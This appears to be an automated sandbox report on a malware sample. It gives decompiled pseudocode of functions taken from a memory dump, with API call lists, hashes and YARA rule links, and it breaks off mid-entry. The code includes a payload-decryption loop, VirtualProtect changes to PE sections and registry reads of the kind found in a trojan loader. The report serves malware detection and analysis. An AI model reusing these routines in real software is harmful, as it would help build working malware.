Opcode ID: e8f4131e6987c00a1a31384ccbb41444220f1aad2c2ab16be4b7e799b3ce7ef4
Instruction ID: 6f699403dffb0bc570d1f84a7b48a89c76b7a09ce5e9a3e6c05fec086a8375cd
Opcode Fuzzy Hash: e8f4131e6987c00a1a31384ccbb41444220f1aad2c2ab16be4b7e799b3ce7ef4
Instruction Fuzzy Hash: DE313672500109EFDF51DFA8DD84A9A3BB8FB48314F144026F905AB251E775AA44EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F9274E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00F9274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xf9a380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00F94E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00F933FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0xf9a290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xf9a388; // 0x40a9c80
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00f92755
0x00f9275c
0x00f9275f
0x00f92766
0x00f9276b
0x00f9276d
0x00f92774
0x00f9277b
0x00000000
0x00000000
0x00f9277d
0x00f92782
0x00f92783
0x00f9278a
0x00f927a4
0x00000000
0x00f9278c
0x00f9278c
0x00f9278e
0x00f92791
0x00f92795
0x00000000
0x00000000
0x00f92797
0x00f92795
0x00f927ae
0x00f927b0
0x00f927b6
0x00f927b8
0x00f927be
0x00f927c5
0x00f927d5
0x00f927cd
0x00f927d0
0x00f927d0
0x00f927d8
0x00f927d8
0x00f927e2
0x00f927e2
0x00f927aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00F9276B

Part of subcall function 00F94E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00F9A380), ref: 00F94EC7
Part of subcall function 00F94E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00F94EE9
Part of subcall function 00F94E9C: memset.NTDLL ref: 00F94F03
Part of subcall function 00F94E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00F94F41
Part of subcall function 00F94E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00F94F55
Part of subcall function 00F94E9C: CloseHandle.KERNEL32(?), ref: 00F94F6C
Part of subcall function 00F94E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00F94F78
Part of subcall function 00F94E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00F94FB9
Part of subcall function 00F94E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00F94FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00F927B0

Part of subcall function 00F933FA: lstrlen.KERNEL32(?,00F9A380,74E47FC0,00000000,00F92788,?,?,?,?,?,00F93EAC,?), ref: 00F93403
Part of subcall function 00F933FA: mbstowcs.NTDLL ref: 00F9342A
Part of subcall function 00F933FA: memset.NTDLL ref: 00F9343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00F93EAC,?), ref: 00F927A4

Strings

Ut, xrefs: 00F927A4

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID: Ut
API String ID: 94831996-8415677
Opcode ID: 286afb993a21a38433cdcccbc2cb173a7cda9606a8c192881fac5e19dadf9589
Instruction ID: f4eb3331440417ca4cd75c799bb403cf998f43ea214455837a294854223b7cf6
Opcode Fuzzy Hash: 286afb993a21a38433cdcccbc2cb173a7cda9606a8c192881fac5e19dadf9589
Instruction Fuzzy Hash: 2911A576A00218FBFF409BE5DC84BA977A9EB44325F100066E501E6190D6759D81FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F9344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00F934A3
SysAllocString.OLEAUT32(00F920DE), ref: 00F934E6
SysFreeString.OLEAUT32(00000000), ref: 00F934FA
SysFreeString.OLEAUT32(00000000), ref: 00F93508

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: bbfa13c37be4f494158fe4138a0d4490696a8ab661633d1799c9a77a2523e4ed
Instruction ID: f2686799e265d9bba6808ded30c47560af6182f228edf508297d34aa639bd8db
Opcode Fuzzy Hash: bbfa13c37be4f494158fe4138a0d4490696a8ab661633d1799c9a77a2523e4ed
Instruction Fuzzy Hash: 55314F7290410AEFDF05DF99D8C48AE7BB5FF48300B25802EF50A97220E7759A45EF61

Uniqueness

Uniqueness Score: -1.00%

Function 100015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100015A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x100041b0;
				_t39 = E10001A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x100041cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x10005137; // 0x10005137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E10001D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x100041cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x100015aa
0x100015ba
0x100015c1
0x100015c4
0x100015d9
0x100015e0
0x100015e5
0x100015f6
0x100015f9
0x10001601
0x10001604
0x100016ae
0x1000160a
0x1000160a
0x1000160e
0x10001676
0x10001610
0x10001610
0x10001613
0x10001615
0x1000161d
0x10001620
0x10001623
0x1000162b
0x10001633
0x10001634
0x10001635
0x1000163c
0x1000163c
0x10001650
0x10001655
0x1000165e
0x10001665
0x10001668
0x1000166c
0x10001671
0x00000000
0x00000000
0x10001628
0x10001628
0x10001673
0x10001680
0x10001695
0x10001682
0x1000168b
0x10001690
0x100016a6
0x100016a6
0x100016b5
0x100016bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 100015F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,100017EC), ref: 1000168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 100016A6

Strings

Mar 26 2021, xrefs: 1000162B

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 62dad8ecebd3a3dc15aa44a41b425b4d7952eb9142e1894383754f03bc2d99a6
Instruction ID: 1e0bd1500fc3cf5386c94b321837961e85a44a819982b39ab5743068bfa5e9ee
Opcode Fuzzy Hash: 62dad8ecebd3a3dc15aa44a41b425b4d7952eb9142e1894383754f03bc2d99a6
Instruction Fuzzy Hash: D3316171E0061AAFEB01CF99CCC1BDEB7B9FF48384F148169E904A7249D771AA458F90

Uniqueness

Uniqueness Score: -1.00%

Function 00F95988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F95988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00F95C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00f95994
0x00f95998
0x00f95999
0x00f9599a
0x00f9599c
0x00f9599e
0x00f959a3
0x00f959a6
0x00f95a3d
0x00f95a44
0x00f95a44
0x00f959af
0x00f959b6
0x00f959c6
0x00f959c6
0x00f959cc
0x00f959ce
0x00f959d3
0x00f959dc
0x00f959e4
0x00f959e7
0x00f959f2
0x00f959f6
0x00f959f8
0x00f959f9
0x00f95a02
0x00f95a06
0x00f95a17
0x00f95a08
0x00f95a0d
0x00f95a12
0x00f95a21
0x00f95a21
0x00f959f6
0x00f95a27
0x00f95a2d
0x00f95a2d
0x00f95a36
0x00f95a3b
0x00f95a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00F959B6
lstrlenW.KERNEL32(?), ref: 00F959EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00F95A0D
SysFreeString.OLEAUT32(?), ref: 00F95A21

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 21d4f765cee58e64199476a7a0343ed0a3b9e2ca9a409cf280b537e497db2ce7
Instruction ID: d240645eff4996e03c59bdf1f83f3aa55baeb2fdbd35c9094b0b87b24f94ad6b
Opcode Fuzzy Hash: 21d4f765cee58e64199476a7a0343ed0a3b9e2ca9a409cf280b537e497db2ce7
Instruction Fuzzy Hash: 66213A75A00609EFDF11DFA8C88899EBBB8FF49714B1082A9E945E7210E7749A01EF50

Uniqueness

Uniqueness Score: -1.00%

Function 10001D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10001D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E100017A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x10001d3b
0x10001d40
0x10001d4e
0x10001d53
0x10001d53
0x10001d59
0x10001d5e
0x10001d62
0x10001d66
0x10001d66
0x10001d70
0x10001d79

APIs

GetCurrentThread.KERNEL32 ref: 10001D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D66

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: fdc63879a4410af3631367093bb185aa8dd17d01f64c48f993c14ac2051b8c2f
Instruction ID: 99b5a2023749ed6b023f9c2d187380a2768fa5325b5415318cb191f808259522
Opcode Fuzzy Hash: fdc63879a4410af3631367093bb185aa8dd17d01f64c48f993c14ac2051b8c2f
Instruction Fuzzy Hash: B5E092313067612BF3026B294CD8EAF7B9CDF922B17024326F524D21E8DB548C0589A5

Uniqueness

Uniqueness Score: -1.00%

Function 10001030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10001030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x100041cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x1000103a
0x10001047
0x1000104d
0x10001059
0x10001069
0x1000106b
0x10001073
0x10001108
0x1000110f
0x00000000
0x00000000
0x00000000
0x10001079
0x10001079
0x10001079
0x1000107d
0x00000000
0x00000000
0x10001089
0x1000108d
0x100010b1
0x100010b5
0x100010c9
0x100010c9
0x100010cf
0x100010de
0x100010e2
0x100010ea
0x100010ea
0x100010f2
0x100010f5
0x10001102
0x00000000
0x00000000
0x00000000
0x00000000
0x10001102
0x100010bd
0x100010c1
0x100010c7
0x00000000
0x00000000
0x00000000
0x100010c7
0x10001095
0x10001099
0x100010a3
0x1000109b
0x1000109b
0x1000109b
0x00000000
0x10001099
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100010DE
GetLastError.KERNEL32 ref: 100010E4

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 2d66f5ca1ce922524a35f350e018dcf219c9d87417cc2836f597ce9f0bcce162
Instruction ID: bdaf6a723815c9082b44b88250c1985d1ce64e349b9a7f7c39f5a4334c5b5f3d
Opcode Fuzzy Hash: 2d66f5ca1ce922524a35f350e018dcf219c9d87417cc2836f597ce9f0bcce162
Instruction Fuzzy Hash: 05215E31800247DFDB04CF95C885AEAF7F5FF08399F008959D14697459E3B8A699CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100016EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100016EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x100041c4);
				_push(1);
				_push( *0x100041d0 + 0x10005089);
				 *0x100041c0 = 0xc;
				 *0x100041c8 = 0; // executed
				L100014D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E10001112( &_v44,  &_v28,  *0x100041cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x100041b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E10001979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x100041b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E10002112(_t40, _t30 + 4);
					}
				}
				_t23 = E10001236(_v44); // executed
				goto L7;
			}

0x100016fe
0x100016ff
0x10001704
0x1000170c
0x1000170d
0x10001717
0x1000171d
0x10001726
0x1000172b
0x10001749
0x1000179e
0x1000179f
0x100017a0
0x100017a0
0x10001751
0x10001757
0x10001765
0x10001769
0x10001770
0x10001778
0x1000177c
0x1000177e
0x1000178d
0x10001780
0x10001786
0x10001786
0x1000177e
0x10001795
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,100041C4,00000000), ref: 1000171D
lstrlenW.KERNEL32(?,?,?), ref: 10001751

Part of subcall function 10001979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?,?), ref: 10001986
Part of subcall function 10001979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 1000199C
Part of subcall function 10001979: _snwprintf.NTDLL ref: 100019C1
Part of subcall function 10001979: CreateFileMappingW.KERNELBASE(000000FF,100041C0,00000004,00000000,?,?), ref: 100019E6
Part of subcall function 10001979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 100019FD
Part of subcall function 10001979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A), ref: 10001A32

ExitThread.KERNEL32 ref: 100017A0

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 8ef217f6671d28fa00b6f9807384dc066bceddc5629933d9472fed0b5d504d9d
Instruction ID: 7f7f0eed2ec510feade31392ae6077df75c8952dedda0e887766f1efda301121
Opcode Fuzzy Hash: 8ef217f6671d28fa00b6f9807384dc066bceddc5629933d9472fed0b5d504d9d
Instruction Fuzzy Hash: 35115BB2108212ABF711DB64CC85EDB7BECEB547D4F020916F548D71A8DB30E5448B95

Uniqueness

Uniqueness Score: -1.00%

Function 00F9779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F9779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xf9a2d0; // 0x310d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xf9ba60; // 0x4f0053
				_v16 = 4;
				_t31 = E00F94C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xf9a2d0; // 0x310d5a8
					_t5 = _t19 + 0xf9babc; // 0x6e0049
					_t34 = E00F94C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00F92A03(_t34);
					}
					E00F92A03(_t31);
				}
				return _v8;
			}

0x00f977a4
0x00f977a9
0x00f977ae
0x00f977b5
0x00f977c1
0x00f977c5
0x00f977c7
0x00f977cd
0x00f977d9
0x00f977dd
0x00f977f0
0x00f977f8
0x00f9780c
0x00f97814
0x00f97816
0x00f97816
0x00f9781d
0x00f9781d
0x00f97824
0x00f97824
0x00f9782a
0x00f9782f
0x00f97835

APIs

Part of subcall function 00F94C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00F977C1,004F0053,00000000,?), ref: 00F94C85
Part of subcall function 00F94C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00F977C1,004F0053,00000000,?), ref: 00F94CAF
Part of subcall function 00F94C7C: memset.NTDLL ref: 00F94CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00F977F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00F9780C
RegCloseKey.ADVAPI32(00000000), ref: 00F9781D

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 77bdbf4f805de040393fa9cd80d56211291bc7b5568c8d324012de0a808f5b53
Instruction ID: 0933c32ae8e5ce9b0e3c4e92d30c5589990c359b47afad11f75fc01a4241c6a5
Opcode Fuzzy Hash: 77bdbf4f805de040393fa9cd80d56211291bc7b5568c8d324012de0a808f5b53
Instruction Fuzzy Hash: 9211217290020DBFEB11EBD8DC89FAEB7BCAF04711F144055B611E7061E7789A04EB65

Uniqueness

Uniqueness Score: -1.00%

Function 00F91896, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F91896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				void* _t52;
				int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t52 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t54 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00F95C4E(_t54);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xf9a320, 0x110);
					_t27 =  *0xf9a324; // 0x0
					_t58 = _t57 + 0xc;
					if(_t27 != 0) {
						E00F975D7(_t46, _a4, 0x110, _t27, 0);
					}
					if(E00F94581( &_v36) != 0) {
						_t35 = E00F935A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t56 = _v20;
							_v36 =  *_t46;
							_v16 = E00F9421A(_t56, _a8, _t52, _t46, _a12);
							 *(_t56 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
							_t58 = _t58 + 0xc;
							E00F92A03(_t56);
						}
					}
					memset(_a4, 0, _t54);
					E00F92A03(_a4);
				}
				return _v16;
			}

0x00f91896
0x00f9189c
0x00f918a1
0x00f918ae
0x00f918b1
0x00f918b4
0x00f918bb
0x00f918be
0x00f918cc
0x00f918d1
0x00f918d6
0x00f918db
0x00f918e6
0x00f918e6
0x00f918f5
0x00f9190a
0x00f91911
0x00f91918
0x00f9191e
0x00f9192c
0x00f91932
0x00f91935
0x00f91942
0x00f91947
0x00f9194b
0x00f9194b
0x00f91911
0x00f91956
0x00f91961
0x00f91961
0x00f9196d

APIs

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

memcpy.NTDLL(00000000,00000110,00F91C1F,00F91C1F,?,?,00F91C1F,?,?,00F924E4,?), ref: 00F918CC
memset.NTDLL ref: 00F91942
memset.NTDLL ref: 00F91956

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: efd3f4ba1221d5a3ea5cfa79c81974ac00e13da1d0efb4402208f9a18e553026
Instruction ID: 864d7ed3dbce327fab1dc309a9a7a17fd0233d0efdd91c833bf784315435a8d5
Opcode Fuzzy Hash: efd3f4ba1221d5a3ea5cfa79c81974ac00e13da1d0efb4402208f9a18e553026
Instruction Fuzzy Hash: 11211B72A00219BBEF11AFA5CC51FAEBBB8AF09750F044025FD04E6251D739DA01ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F92A03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F92A03(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xf9a290, 0, _a4); // executed
				return _t2;
			}

0x00f92a0f
0x00f92a15

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

Strings

Ut, xrefs: 00F92A0F

Memory Dump Source

